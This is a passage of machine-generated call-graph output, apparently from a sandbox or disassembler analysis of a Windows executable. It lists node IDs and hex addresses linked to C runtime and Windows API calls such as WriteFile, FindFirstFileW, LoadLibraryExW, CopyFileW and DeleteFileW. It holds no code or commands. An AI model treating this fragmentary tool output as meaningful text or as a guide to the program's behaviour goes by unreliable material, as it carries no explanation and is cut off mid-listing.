101729 365371 101726->101729 101728 362d55 _free 58 API calls 101727->101728 101727->101729 101728->101729 101730 3646e6 101729->101730 101731 364705 101730->101731 101732 3646f0 101730->101732 101731->101713 101907 368b28 58 API calls __getptd_noexit 101732->101907 101734 3646f5 101908 368db6 9 API calls __write 101734->101908 101736 364700 101736->101713 101738 370a0e __write 101737->101738 101739 370a32 101738->101739 101740 370a1b 101738->101740 101742 370abd 101739->101742 101744 370a42 101739->101744 101924 368af4 58 API calls __getptd_noexit 101740->101924 101929 368af4 58 API calls __getptd_noexit 101742->101929 101743 370a20 101925 368b28 58 API calls __getptd_noexit 101743->101925 101747 370a60 101744->101747 101748 370a6a 101744->101748 101926 368af4 58 API calls __getptd_noexit 101747->101926 101751 36d206 ___lock_fhandle 59 API calls 101748->101751 101749 370a65 101930 368b28 58 API calls __getptd_noexit 101749->101930 101753 370a70 101751->101753 101754 370a83 101753->101754 101755 370a8e 101753->101755 101909 370add 101754->101909 101927 368b28 58 API calls __getptd_noexit 101755->101927 101756 370ac9 101931 368db6 9 API calls __write 101756->101931 101758 370a27 __write 101758->101715 101761 370a89 101928 370ab5 LeaveCriticalSection __unlock_fhandle 101761->101928 101763->101705 101764->101709 101766 36d892 __write 101765->101766 101767 36d8b6 101766->101767 101768 36d89f 101766->101768 101770 36d955 101767->101770 101771 36d8ca 101767->101771 101866 368af4 58 API calls __getptd_noexit 101768->101866 101872 368af4 58 API calls __getptd_noexit 101770->101872 101774 36d8f2 101771->101774 101775 36d8e8 101771->101775 101773 36d8a4 101867 368b28 58 API calls __getptd_noexit 101773->101867 101793 36d206 101774->101793 101868 368af4 58 API calls __getptd_noexit 101775->101868 101776 36d8ed 101873 368b28 58 API calls __getptd_noexit 101776->101873 101780 36d8f8 101782 36d91e 101780->101782 101783 36d90b 101780->101783 101869 368b28 58 API calls __getptd_noexit 101782->101869 101802 36d975 101783->101802 101784 36d961 101874 368db6 9 API calls __write 101784->101874 101788 36d917 101871 36d94d LeaveCriticalSection __unlock_fhandle 101788->101871 101789 36d923 101870 368af4 58 API calls __getptd_noexit 101789->101870 101790 36d8ab __write 101790->101722 101794 36d212 __write 101793->101794 101795 36d261 EnterCriticalSection 101794->101795 101797 369c0b __lock 58 API calls 101794->101797 101796 36d287 __write 101795->101796 101796->101780 101798 36d237 101797->101798 101799 36d24f 101798->101799 101875 369e2b InitializeCriticalSectionAndSpinCount 101798->101875 101876 36d28b LeaveCriticalSection _doexit 101799->101876 101803 36d982 __write_nolock 101802->101803 101804 36d9e0 101803->101804 101805 36d9c1 101803->101805 101833 36d9b6 101803->101833 101808 36da38 101804->101808 101809 36da1c 101804->101809 101886 368af4 58 API calls __getptd_noexit 101805->101886 101812 36da51 101808->101812 101892 3718c1 60 API calls 3 library calls 101808->101892 101889 368af4 58 API calls __getptd_noexit 101809->101889 101810 36e1d6 101810->101788 101811 36d9c6 101887 368b28 58 API calls __getptd_noexit 101811->101887 101877 375c6b 101812->101877 101816 36d9cd 101888 368db6 9 API calls __write 101816->101888 101818 36da21 101890 368b28 58 API calls __getptd_noexit 101818->101890 101820 36da5f 101822 36ddb8 101820->101822 101893 3699ac 58 API calls 2 library calls 101820->101893 101824 36ddd6 101822->101824 101825 36e14b WriteFile 101822->101825 101823 36da28 101891 368db6 9 API calls __write 101823->101891 101828 36defa 101824->101828 101837 36ddec 101824->101837 101829 36ddab GetLastError 101825->101829 101835 36dd78 101825->101835 101839 36df05 101828->101839 101843 36dfef 101828->101843 101829->101835 101830 36da8b GetConsoleMode 101830->101822 101832 36daca 101830->101832 101831 36e184 101831->101833 101898 368b28 58 API calls __getptd_noexit 101831->101898 101832->101822 101836 36dada GetConsoleCP 101832->101836 101900 36c5f6 101833->101900 101835->101831 101835->101833 101842 36ded8 101835->101842 101836->101831 101861 36db09 101836->101861 101837->101831 101838 36de5b WriteFile 101837->101838 101838->101829 101840 36de98 101838->101840 101839->101831 101844 36df6a WriteFile 101839->101844 101840->101837 101845 36debc 101840->101845 101841 36e1b2 101899 368af4 58 API calls __getptd_noexit 101841->101899 101847 36dee3 101842->101847 101848 36e17b 101842->101848 101843->101831 101849 36e064 WideCharToMultiByte 101843->101849 101844->101829 101850 36dfb9 101844->101850 101845->101835 101895 368b28 58 API calls __getptd_noexit 101847->101895 101897 368b07 58 API calls 2 library calls 101848->101897 101849->101829 101858 36e0ab 101849->101858 101850->101835 101850->101839 101850->101845 101853 36e0b3 WriteFile 101856 36e106 GetLastError 101853->101856 101853->101858 101854 36dee8 101896 368af4 58 API calls __getptd_noexit 101854->101896 101856->101858 101858->101835 101858->101843 101858->101845 101858->101853 101859 3762ba 60 API calls __write_nolock 101859->101861 101860 377a5e WriteConsoleW CreateFileW __putwch_nolock 101864 36dc5f 101860->101864 101861->101835 101861->101859 101862 36dbf2 WideCharToMultiByte 101861->101862 101861->101864 101894 3635f5 58 API calls __isleadbyte_l 101861->101894 101862->101835 101863 36dc2d WriteFile 101862->101863 101863->101829 101863->101864 101864->101829 101864->101835 101864->101860 101864->101861 101865 36dc87 WriteFile 101864->101865 101865->101829 101865->101864 101866->101773 101867->101790 101868->101776 101869->101789 101870->101788 101871->101790 101872->101776 101873->101784 101874->101790 101875->101799 101876->101795 101878 375c76 101877->101878 101879 375c83 101877->101879 101880 368b28 __write 58 API calls 101878->101880 101882 375c8f 101879->101882 101883 368b28 __write 58 API calls 101879->101883 101881 375c7b 101880->101881 101881->101820 101882->101820 101884 375cb0 101883->101884 101885 368db6 __write 9 API calls 101884->101885 101885->101881 101886->101811 101887->101816 101888->101833 101889->101818 101890->101823 101891->101833 101892->101812 101893->101830 101894->101861 101895->101854 101896->101833 101897->101833 101898->101841 101899->101833 101901 36c600 IsProcessorFeaturePresent 101900->101901 101902 36c5fe 101900->101902 101904 37590a 101901->101904 101902->101810 101905 3758b9 ___raise_securityfailure 5 API calls 101904->101905 101906 3759ed 101905->101906 101906->101810 101907->101734 101908->101736 101932 36d4c3 101909->101932 101911 370b41 101945 36d43d 59 API calls __write 101911->101945 101912 370aeb 101912->101911 101914 370b1f 101912->101914 101917 36d4c3 __close_nolock 58 API calls 101912->101917 101914->101911 101915 36d4c3 __close_nolock 58 API calls 101914->101915 101918 370b2b CloseHandle 101915->101918 101916 370b49 101919 370b6b 101916->101919 101946 368b07 58 API calls 2 library calls 101916->101946 101920 370b16 101917->101920 101918->101911 101921 370b37 GetLastError 101918->101921 101919->101761 101923 36d4c3 __close_nolock 58 API calls 101920->101923 101921->101911 101923->101914 101924->101743 101925->101758 101926->101749 101927->101761 101928->101758 101929->101749 101930->101756 101931->101758 101933 36d4e3 101932->101933 101934 36d4ce 101932->101934 101939 36d508 101933->101939 101949 368af4 58 API calls __getptd_noexit 101933->101949 101947 368af4 58 API calls __getptd_noexit 101934->101947 101936 36d4d3 101948 368b28 58 API calls __getptd_noexit 101936->101948 101939->101912 101940 36d512 101950 368b28 58 API calls __getptd_noexit 101940->101950 101941 36d4db 101941->101912 101943 36d51a 101951 368db6 9 API calls __write 101943->101951 101945->101916 101946->101919 101947->101936 101948->101941 101949->101940 101950->101943 101951->101941 101953 3a3c3e 101952->101953 101954 3a4475 FindFirstFileW 101952->101954 101953->101385 101954->101953 101955 3a448a FindClose 101954->101955 101955->101953 102171 344bb5 101956->102171 101961 37d8e6 101964 344e4a 84 API calls 101961->101964 101962 344e08 LoadLibraryExW 102181 344b6a 101962->102181 101965 37d8ed 101964->101965 101967 344b6a 3 API calls 101965->101967 101969 37d8f5 101967->101969 102207 344f0b 101969->102207 101970 344e2f 101970->101969 101971 344e3b 101970->101971 101973 344e4a 84 API calls 101971->101973 101975 344e40 101973->101975 101975->101567 101975->101569 101977 37d91c 102213 344ec7 101977->102213 101981 347667 59 API calls 101980->101981 101982 3445b1 101981->101982 101983 347667 59 API calls 101982->101983 101984 3445b9 101983->101984 101985 347667 59 API calls 101984->101985 101986 3445c1 101985->101986 101987 347667 59 API calls 101986->101987 101988 3445c9 101987->101988 101989 37d4d2 101988->101989 101990 3445fd 101988->101990 101991 348047 59 API calls 101989->101991 101992 34784b 59 API calls 101990->101992 101993 37d4db 101991->101993 101994 34460b 101992->101994 102499 347d8c 101993->102499 102495 347d2c 101994->102495 101997 344615 101998 344640 101997->101998 101999 34784b 59 API calls 101997->101999 102000 344680 101998->102000 102001 34465f 101998->102001 102013 37d4fb 101998->102013 102002 344636 101999->102002 102482 34784b 102000->102482 102007 3479f2 59 API calls 102001->102007 102006 347d2c 59 API calls 102002->102006 102004 344691 102008 3446a3 102004->102008 102011 348047 59 API calls 102004->102011 102005 37d5cb 102009 347bcc 59 API calls 102005->102009 102006->101998 102010 344669 102007->102010 102012 3446b3 102008->102012 102014 348047 59 API calls 102008->102014 102026 37d588 102009->102026 102010->102000 102017 34784b 59 API calls 102010->102017 102011->102008 102016 3446ba 102012->102016 102018 348047 59 API calls 102012->102018 102013->102005 102015 37d5b4 102013->102015 102022 37d532 102013->102022 102014->102012 102015->102005 102020 37d59f 102015->102020 102019 348047 59 API calls 102016->102019 102028 3446c1 Mailbox 102016->102028 102017->102000 102018->102016 102019->102028 102024 347bcc 59 API calls 102020->102024 102021 37d590 102023 347bcc 59 API calls 102021->102023 102022->102021 102029 37d57b 102022->102029 102023->102026 102024->102026 102025 3479f2 59 API calls 102025->102026 102026->102000 102026->102025 102503 347924 59 API calls 2 library calls 102026->102503 102028->101598 102030 347bcc 59 API calls 102029->102030 102030->102026 102032 347e4f 59 API calls 102031->102032 102033 3479fd 102032->102033 102033->101604 102033->101607 102035 347b40 102034->102035 102036 37ec6b 102034->102036 102505 347a51 102035->102505 102511 397bdb 59 API calls _memmove 102036->102511 102039 347b4c 102039->101614 102040 37ec75 102041 348047 59 API calls 102040->102041 102042 37ec7d Mailbox 102041->102042 102044 3a408d 102043->102044 102045 3a4092 102044->102045 102046 3a40a0 102044->102046 102047 348047 59 API calls 102045->102047 102048 347667 59 API calls 102046->102048 102096 3a409b Mailbox 102047->102096 102049 3a40a8 102048->102049 102050 347667 59 API calls 102049->102050 102051 3a40b0 102050->102051 102052 347667 59 API calls 102051->102052 102053 3a40bb 102052->102053 102054 347667 59 API calls 102053->102054 102055 3a40c3 102054->102055 102056 347667 59 API calls 102055->102056 102057 3a40cb 102056->102057 102058 347667 59 API calls 102057->102058 102059 3a40d3 102058->102059 102060 347667 59 API calls 102059->102060 102061 3a40db 102060->102061 102062 347667 59 API calls 102061->102062 102063 3a40e3 102062->102063 102064 34459b 59 API calls 102063->102064 102065 3a40fa 102064->102065 102066 34459b 59 API calls 102065->102066 102067 3a4113 102066->102067 102068 3479f2 59 API calls 102067->102068 102069 3a411f 102068->102069 102070 3a4132 102069->102070 102071 347d2c 59 API calls 102069->102071 102072 3479f2 59 API calls 102070->102072 102071->102070 102073 3a413b 102072->102073 102074 3a414b 102073->102074 102075 347d2c 59 API calls 102073->102075 102076 348047 59 API calls 102074->102076 102075->102074 102077 3a4157 102076->102077 102078 347b2e 59 API calls 102077->102078 102079 3a4163 102078->102079 102512 3a4223 59 API calls 102079->102512 102081 3a4172 102513 3a4223 59 API calls 102081->102513 102083 3a4185 102084 3479f2 59 API calls 102083->102084 102085 3a418f 102084->102085 102086 3a41a6 102085->102086 102087 3a4194 102085->102087 102088 3479f2 59 API calls 102086->102088 102089 347cab 59 API calls 102087->102089 102090 3a41af 102088->102090 102091 3a41a1 102089->102091 102092 3a41cd 102090->102092 102093 347cab 59 API calls 102090->102093 102094 347b2e 59 API calls 102091->102094 102095 347b2e 59 API calls 102092->102095 102093->102091 102094->102092 102095->102096 102096->101622 102098 3a9162 __write_nolock 102097->102098 102099 360db6 Mailbox 59 API calls 102098->102099 102100 3a91bf 102099->102100 102101 34522e 59 API calls 102100->102101 102102 3a91c9 102101->102102 102514 3a8f5f 102102->102514 102104 3a91d4 102105 344ee5 85 API calls 102104->102105 102106 3a91e7 _wcscmp 102105->102106 102107 3a920b 102106->102107 102108 3a92b8 102106->102108 102534 3a9734 96 API calls 2 library calls 102107->102534 102537 3a9734 96 API calls 2 library calls 102108->102537 102111 3a9210 102114 3a92c1 102111->102114 102535 3640fb 58 API calls __wsplitpath_helper 102111->102535 102113 344f0b 74 API calls 102115 3a92dd 102113->102115 102114->101629 102116 344f0b 74 API calls 102115->102116 102118 3a92ed 102116->102118 102117 3a9239 _wcscat _wcscpy 102536 3640fb 58 API calls __wsplitpath_helper 102117->102536 102119 344f0b 74 API calls 102118->102119 102121 3a9308 102119->102121 102122 344f0b 74 API calls 102121->102122 102123 3a9318 102122->102123 102124 344f0b 74 API calls 102123->102124 102126 3a9333 102124->102126 102125 3a9284 _wcscat 102125->102113 102125->102114 102127 344f0b 74 API calls 102126->102127 102128 3a9343 102127->102128 102129 344f0b 74 API calls 102128->102129 102130 3a9353 102129->102130 102131 344f0b 74 API calls 102130->102131 102132 3a9363 102131->102132 102517 3a98e3 GetTempPathW GetTempFileNameW 102132->102517 102134 3a936f 102135 36525b 115 API calls 102134->102135 102146 3a9380 102135->102146 102136 3a943a 102137 3653a6 __fcloseall 83 API calls 102136->102137 102138 3a9445 102137->102138 102140 3a944b DeleteFileW 102138->102140 102141 3a945f 102138->102141 102139 344f0b 74 API calls 102139->102146 102140->102114 102142 3a9505 CopyFileW 102141->102142 102147 3a9469 _wcsncpy 102141->102147 102144 3a952d DeleteFileW 102142->102144 102146->102114 102146->102136 102146->102139 102518 364863 102146->102518 102538 3a8b06 102147->102538 102152->101555 102154 347cbf 102153->102154 102155 37ed4a 102153->102155 102631 347c50 102154->102631 102157 348029 59 API calls 102155->102157 102159 37ed55 __wsetenvp _memmove 102157->102159 102158 347cca 102158->101590 102160->101591 102161->101603 102163 347c45 102162->102163 102164 347bd8 __wsetenvp 102162->102164 102165 347d2c 59 API calls 102163->102165 102167 347c13 102164->102167 102168 347bee 102164->102168 102166 347bf6 _memmove 102165->102166 102166->101613 102170 348029 59 API calls 102167->102170 102636 347f27 59 API calls Mailbox 102168->102636 102170->102166 102218 344c03 102171->102218 102174 344c03 2 API calls 102177 344bdc 102174->102177 102175 344bf5 102178 36525b 102175->102178 102176 344bec FreeLibrary 102176->102175 102177->102175 102177->102176 102222 365270 102178->102222 102180 344dfc 102180->101961 102180->101962 102303 344c36 102181->102303 102184 344c36 2 API calls 102187 344b8f 102184->102187 102185 344ba1 FreeLibrary 102186 344baa 102185->102186 102188 344c70 102186->102188 102187->102185 102187->102186 102189 360db6 Mailbox 59 API calls 102188->102189 102190 344c85 102189->102190 102307 34522e 102190->102307 102192 344c91 _memmove 102193 344ccc 102192->102193 102194 344dc1 102192->102194 102195 344d89 102192->102195 102196 344ec7 69 API calls 102193->102196 102321 3a991b 95 API calls 102194->102321 102310 344e89 CreateStreamOnHGlobal 102195->102310 102199 344cd5 102196->102199 102200 344f0b 74 API calls 102199->102200 102201 344d69 102199->102201 102203 37d8a7 102199->102203 102316 344ee5 102199->102316 102200->102199 102201->101970 102204 344ee5 85 API calls 102203->102204 102205 37d8bb 102204->102205 102206 344f0b 74 API calls 102205->102206 102206->102201 102208 344f1d 102207->102208 102211 37d9cd 102207->102211 102339 3655e2 102208->102339 102212 3a9109 GetSystemTimeAsFileTime 102212->101977 102214 344ed6 102213->102214 102215 37d990 102213->102215 102464 365c60 102214->102464 102217 344ede 102219 344bd0 102218->102219 102220 344c0c LoadLibraryA 102218->102220 102219->102174 102219->102177 102220->102219 102221 344c1d GetProcAddress 102220->102221 102221->102219 102224 36527c __write 102222->102224 102223 36528f 102271 368b28 58 API calls __getptd_noexit 102223->102271 102224->102223 102227 3652c0 102224->102227 102226 365294 102272 368db6 9 API calls __write 102226->102272 102241 3704e8 102227->102241 102230 3652c5 102231 3652ce 102230->102231 102232 3652db 102230->102232 102273 368b28 58 API calls __getptd_noexit 102231->102273 102234 365305 102232->102234 102235 3652e5 102232->102235 102256 370607 102234->102256 102274 368b28 58 API calls __getptd_noexit 102235->102274 102240 36529f __write @_EH4_CallFilterFunc@8 102240->102180 102242 3704f4 __write 102241->102242 102243 369c0b __lock 58 API calls 102242->102243 102254 370502 102243->102254 102244 370576 102276 3705fe 102244->102276 102245 37057d 102281 36881d 58 API calls __malloc_crt 102245->102281 102248 370584 102248->102244 102282 369e2b InitializeCriticalSectionAndSpinCount 102248->102282 102249 3705f3 __write 102249->102230 102251 369c93 __mtinitlocknum 58 API calls 102251->102254 102253 3705aa EnterCriticalSection 102253->102244 102254->102244 102254->102245 102254->102251 102279 366c50 59 API calls __lock 102254->102279 102280 366cba LeaveCriticalSection LeaveCriticalSection _doexit 102254->102280 102257 370627 __wopenfile 102256->102257 102258 370641 102257->102258 102270 3707fc 102257->102270 102289 3637cb 60 API calls 2 library calls 102257->102289 102287 368b28 58 API calls __getptd_noexit 102258->102287 102260 370646 102288 368db6 9 API calls __write 102260->102288 102262 37085f 102284 3785a1 102262->102284 102264 365310 102275 365332 LeaveCriticalSection LeaveCriticalSection _fseek 102264->102275 102266 3707f5 102266->102270 102290 3637cb 60 API calls 2 library calls 102266->102290 102268 370814 102268->102270 102291 3637cb 60 API calls 2 library calls 102268->102291 102270->102258 102270->102262 102271->102226 102272->102240 102273->102240 102274->102240 102275->102240 102283 369d75 LeaveCriticalSection 102276->102283 102278 370605 102278->102249 102279->102254 102280->102254 102281->102248 102282->102253 102283->102278 102292 377d85 102284->102292 102286 3785ba 102286->102264 102287->102260 102288->102264 102289->102266 102290->102268 102291->102270 102295 377d91 __write 102292->102295 102293 377da7 102294 368b28 __write 58 API calls 102293->102294 102296 377dac 102294->102296 102295->102293 102297 377ddd 102295->102297 102298 368db6 __write 9 API calls 102296->102298 102299 377e4e __wsopen_nolock 109 API calls 102297->102299 102302 377db6 __write 102298->102302 102300 377df9 102299->102300 102301 377e22 __wsopen_helper LeaveCriticalSection 102300->102301 102301->102302 102302->102286 102304 344b83 102303->102304 102305 344c3f LoadLibraryA 102303->102305 102304->102184 102304->102187 102305->102304 102306 344c50 GetProcAddress 102305->102306 102306->102304 102308 360db6 Mailbox 59 API calls 102307->102308 102309 345240 102308->102309 102309->102192 102311 344ea3 FindResourceExW 102310->102311 102315 344ec0 102310->102315 102312 37d933 LoadResource 102311->102312 102311->102315 102313 37d948 SizeofResource 102312->102313 102312->102315 102314 37d95c LockResource 102313->102314 102313->102315 102314->102315 102315->102193 102317 344ef4 102316->102317 102318 37d9ab 102316->102318 102322 36584d 102317->102322 102320 344f02 102320->102199 102321->102193 102323 365859 __write 102322->102323 102324 36586b 102323->102324 102325 365891 102323->102325 102335 368b28 58 API calls __getptd_noexit 102324->102335 102328 366c11 __lock_file 59 API calls 102325->102328 102327 365870 102336 368db6 9 API calls __write 102327->102336 102330 365897 102328->102330 102337 3657be 83 API calls 4 library calls 102330->102337 102332 3658a6 102338 3658c8 LeaveCriticalSection LeaveCriticalSection _fseek 102332->102338 102334 36587b __write 102334->102320 102335->102327 102336->102334 102337->102332 102338->102334 102342 3655fd 102339->102342 102341 344f2e 102341->102212 102343 365609 __write 102342->102343 102344 36561f _memset 102343->102344 102345 36564c 102343->102345 102346 365644 __write 102343->102346 102369 368b28 58 API calls __getptd_noexit 102344->102369 102347 366c11 __lock_file 59 API calls 102345->102347 102346->102341 102349 365652 102347->102349 102355 36541d 102349->102355 102350 365639 102370 368db6 9 API calls __write 102350->102370 102359 365438 _memset 102355->102359 102362 365453 102355->102362 102356 365443 102460 368b28 58 API calls __getptd_noexit 102356->102460 102358 365448 102461 368db6 9 API calls __write 102358->102461 102359->102356 102359->102362 102367 365493 102359->102367 102371 365686 LeaveCriticalSection LeaveCriticalSection _fseek 102362->102371 102363 3655a4 _memset 102463 368b28 58 API calls __getptd_noexit 102363->102463 102365 3646e6 __fseek_nolock 58 API calls 102365->102367 102367->102362 102367->102363 102367->102365 102372 370e5b 102367->102372 102440 370ba7 102367->102440 102462 370cc8 58 API calls 3 library calls 102367->102462 102369->102350 102370->102346 102371->102346 102373 370e93 102372->102373 102374 370e7c 102372->102374 102375 3715cb 102373->102375 102379 370ecd 102373->102379 102376 368af4 __write 58 API calls 102374->102376 102377 368af4 __write 58 API calls 102375->102377 102378 370e81 102376->102378 102380 3715d0 102377->102380 102381 368b28 __write 58 API calls 102378->102381 102382 370ed5 102379->102382 102389 370eec 102379->102389 102383 368b28 __write 58 API calls 102380->102383 102386 370e88 102381->102386 102384 368af4 __write 58 API calls 102382->102384 102385 370ee1 102383->102385 102393 370eda 102384->102393 102387 368db6 __write 9 API calls 102385->102387 102386->102367 102387->102386 102388 370f01 102392 368af4 __write 58 API calls 102388->102392 102389->102386 102389->102388 102390 370f1b 102389->102390 102394 370f39 102389->102394 102390->102388 102395 370f26 102390->102395 102391 368b28 __write 58 API calls 102391->102385 102392->102393 102393->102391 102396 36881d __malloc_crt 58 API calls 102394->102396 102398 375c6b __write_nolock 58 API calls 102395->102398 102397 370f49 102396->102397 102399 370f51 102397->102399 102400 370f6c 102397->102400 102401 37103a 102398->102401 102404 368b28 __write 58 API calls 102399->102404 102403 3718c1 __lseeki64_nolock 60 API calls 102400->102403 102402 3710b3 ReadFile 102401->102402 102405 371050 GetConsoleMode 102401->102405 102406 3710d5 102402->102406 102407 371593 GetLastError 102402->102407 102403->102395 102408 370f56 102404->102408 102409 371064 102405->102409 102410 3710b0 102405->102410 102406->102407 102415 3710a5 102406->102415 102411 371093 102407->102411 102412 3715a0 102407->102412 102413 368af4 __write 58 API calls 102408->102413 102409->102410 102414 37106a ReadConsoleW 102409->102414 102410->102402 102419 368b07 __dosmaperr 58 API calls 102411->102419 102422 371099 102411->102422 102416 368b28 __write 58 API calls 102412->102416 102413->102386 102414->102415 102418 37108d GetLastError 102414->102418 102415->102422 102423 37110a 102415->102423 102426 371377 102415->102426 102417 3715a5 102416->102417 102420 368af4 __write 58 API calls 102417->102420 102418->102411 102419->102422 102420->102422 102421 362d55 _free 58 API calls 102421->102386 102422->102386 102422->102421 102425 371176 ReadFile 102423->102425 102433 3711f7 102423->102433 102428 371197 GetLastError 102425->102428 102438 3711a1 102425->102438 102426->102422 102427 37147d ReadFile 102426->102427 102432 3714a0 GetLastError 102427->102432 102439 3714ae 102427->102439 102428->102438 102429 3712b4 102434 371264 MultiByteToWideChar 102429->102434 102435 3718c1 __lseeki64_nolock 60 API calls 102429->102435 102430 3712a4 102431 368b28 __write 58 API calls 102430->102431 102431->102422 102432->102439 102433->102422 102433->102429 102433->102430 102433->102434 102434->102418 102434->102422 102435->102434 102436 3718c1 __lseeki64_nolock 60 API calls 102436->102438 102437 3718c1 __lseeki64_nolock 60 API calls 102437->102439 102438->102423 102438->102436 102439->102426 102439->102437 102441 370bb2 102440->102441 102445 370bc7 102440->102445 102442 368b28 __write 58 API calls 102441->102442 102443 370bb7 102442->102443 102444 368db6 __write 9 API calls 102443->102444 102452 370bc2 102444->102452 102446 370bfc 102445->102446 102447 375fe4 __getbuf 58 API calls 102445->102447 102445->102452 102448 3646e6 __fseek_nolock 58 API calls 102446->102448 102447->102446 102449 370c10 102448->102449 102450 370d47 __read 72 API calls 102449->102450 102451 370c17 102450->102451 102451->102452 102453 3646e6 __fseek_nolock 58 API calls 102451->102453 102452->102367 102454 370c3a 102453->102454 102454->102452 102455 3646e6 __fseek_nolock 58 API calls 102454->102455 102456 370c46 102455->102456 102456->102452 102457 3646e6 __fseek_nolock 58 API calls 102456->102457 102458 370c53 102457->102458 102459 3646e6 __fseek_nolock 58 API calls 102458->102459 102459->102452 102460->102358 102461->102362 102462->102367 102463->102358 102465 365c6c __write 102464->102465 102466 365c93 102465->102466 102467 365c7e 102465->102467 102469 366c11 __lock_file 59 API calls 102466->102469 102478 368b28 58 API calls __getptd_noexit 102467->102478 102471 365c99 102469->102471 102470 365c83 102479 368db6 9 API calls __write 102470->102479 102480 3658d0 67 API calls 5 library calls 102471->102480 102474 365ca4 102481 365cc4 LeaveCriticalSection LeaveCriticalSection _fseek 102474->102481 102476 365cb6 102477 365c8e __write 102476->102477 102477->102217 102478->102470 102479->102477 102480->102474 102481->102476 102483 3478b7 102482->102483 102484 34785a 102482->102484 102486 347d2c 59 API calls 102483->102486 102484->102483 102485 347865 102484->102485 102487 347880 102485->102487 102488 37eb09 102485->102488 102491 347888 _memmove 102486->102491 102504 347f27 59 API calls Mailbox 102487->102504 102490 348029 59 API calls 102488->102490 102492 37eb13 102490->102492 102491->102004 102493 360db6 Mailbox 59 API calls 102492->102493 102494 37eb33 102493->102494 102496 347d43 _memmove 102495->102496 102497 347d3a 102495->102497 102496->101997 102497->102496 102498 347e4f 59 API calls 102497->102498 102498->102496 102500 347da6 102499->102500 102502 347d99 102499->102502 102501 360db6 Mailbox 59 API calls 102500->102501 102501->102502 102502->101998 102503->102026 102504->102491 102506 347a5f 102505->102506 102508 347a85 _memmove 102505->102508 102507 360db6 Mailbox 59 API calls 102506->102507 102506->102508 102509 347ad4 102507->102509 102508->102039 102510 360db6 Mailbox 59 API calls 102509->102510 102510->102508 102511->102040 102512->102081 102513->102083 102569 36520a GetSystemTimeAsFileTime 102514->102569 102516 3a8f6e 102516->102104 102517->102134 102519 36486f __write 102518->102519 102520 3648a5 102519->102520 102521 36488d 102519->102521 102523 36489d __write 102519->102523 102524 366c11 __lock_file 59 API calls 102520->102524 102583 368b28 58 API calls __getptd_noexit 102521->102583 102523->102146 102526 3648ab 102524->102526 102525 364892 102584 368db6 9 API calls __write 102525->102584 102534->102111 102535->102117 102536->102125 102537->102125 102570 365238 __aulldiv 102569->102570 102570->102516 102583->102525 102584->102523 102632 347c5f __wsetenvp 102631->102632 102633 347c70 _memmove 102632->102633 102634 348029 59 API calls 102632->102634 102633->102158 102635 37ed07 _memmove 102634->102635 102636->102166 102637->101409 102638->101410 102639->101301 102640->101301 102641->101297 102642->101295 102643->101288 102644->101295 102645->101324 102646->101330 102647 367c56 102648 367c62 __write 102647->102648 102684 369e08 GetStartupInfoW 102648->102684 102650 367c67 102686 368b7c GetProcessHeap 102650->102686 102652 367cbf 102653 367cca 102652->102653 102769 367da6 58 API calls 3 library calls 102652->102769 102687 369ae6 102653->102687 102656 367cd0 102657 367cdb __RTC_Initialize 102656->102657 102770 367da6 58 API calls 3 library calls 102656->102770 102708 36d5d2 102657->102708 102660 367cea 102661 367cf6 GetCommandLineW 102660->102661 102771 367da6 58 API calls 3 library calls 102660->102771 102727 374f23 GetEnvironmentStringsW 102661->102727 102664 367cf5 102664->102661 102667 367d10 102668 367d1b 102667->102668 102772 3630b5 58 API calls 3 library calls 102667->102772 102737 374d58 102668->102737 102671 367d21 102672 367d2c 102671->102672 102773 3630b5 58 API calls 3 library calls 102671->102773 102751 3630ef 102672->102751 102675 367d34 102676 367d3f __wwincmdln 102675->102676 102774 3630b5 58 API calls 3 library calls 102675->102774 102757 3447d0 102676->102757 102679 367d53 102680 367d62 102679->102680 102775 363358 58 API calls _doexit 102679->102775 102776 3630e0 58 API calls _doexit 102680->102776 102683 367d67 __write 102685 369e1e 102684->102685 102685->102650 102686->102652 102777 363187 36 API calls 2 library calls 102687->102777 102689 369aeb 102778 369d3c InitializeCriticalSectionAndSpinCount __mtinitlocks 102689->102778 102691 369af0 102692 369af4 102691->102692 102780 369d8a TlsAlloc 102691->102780 102779 369b5c 61 API calls 2 library calls 102692->102779 102695 369b06 102695->102692 102697 369b11 102695->102697 102696 369af9 102696->102656 102781 3687d5 102697->102781 102700 369b53 102789 369b5c 61 API calls 2 library calls 102700->102789 102703 369b32 102703->102700 102705 369b38 102703->102705 102704 369b58 102704->102656 102788 369a33 58 API calls 4 library calls 102705->102788 102707 369b40 GetCurrentThreadId 102707->102656 102709 36d5de __write 102708->102709 102710 369c0b __lock 58 API calls 102709->102710 102711 36d5e5 102710->102711 102712 3687d5 __calloc_crt 58 API calls 102711->102712 102713 36d5f6 102712->102713 102714 36d661 GetStartupInfoW 102713->102714 102716 36d601 __write @_EH4_CallFilterFunc@8 102713->102716 102715 36d7a5 102714->102715 102722 36d676 102714->102722 102717 36d86d 102715->102717 102720 36d7f2 GetStdHandle 102715->102720 102721 36d805 GetFileType 102715->102721 102802 369e2b InitializeCriticalSectionAndSpinCount 102715->102802 102716->102660 102803 36d87d LeaveCriticalSection _doexit 102717->102803 102719 3687d5 __calloc_crt 58 API calls 102719->102722 102720->102715 102721->102715 102722->102715 102722->102719 102723 36d6c4 102722->102723 102723->102715 102724 36d6f8 GetFileType 102723->102724 102801 369e2b InitializeCriticalSectionAndSpinCount 102723->102801 102724->102723 102728 374f34 102727->102728 102729 367d06 102727->102729 102804 36881d 58 API calls __malloc_crt 102728->102804 102733 374b1b GetModuleFileNameW 102729->102733 102731 374f5a _memmove 102732 374f70 FreeEnvironmentStringsW 102731->102732 102732->102729 102734 374b4f _wparse_cmdline 102733->102734 102736 374b8f _wparse_cmdline 102734->102736 102805 36881d 58 API calls __malloc_crt 102734->102805 102736->102667 102738 374d69 102737->102738 102739 374d71 __wsetenvp 102737->102739 102738->102671 102740 3687d5 __calloc_crt 58 API calls 102739->102740 102747 374d9a __wsetenvp 102740->102747 102741 374df1 102742 362d55 _free 58 API calls 102741->102742 102742->102738 102743 3687d5 __calloc_crt 58 API calls 102743->102747 102744 374e16 102745 362d55 _free 58 API calls 102744->102745 102745->102738 102747->102738 102747->102741 102747->102743 102747->102744 102748 374e2d 102747->102748 102806 374607 58 API calls __write 102747->102806 102807 368dc6 IsProcessorFeaturePresent 102748->102807 102750 374e39 102750->102671 102752 3630fb __IsNonwritableInCurrentImage 102751->102752 102822 36a4d1 102752->102822 102754 363119 __initterm_e 102755 362d40 __cinit 67 API calls 102754->102755 102756 363138 _doexit __IsNonwritableInCurrentImage 102754->102756 102755->102756 102756->102675 102758 3447ea 102757->102758 102768 344889 102757->102768 102759 344824 IsThemeActive 102758->102759 102825 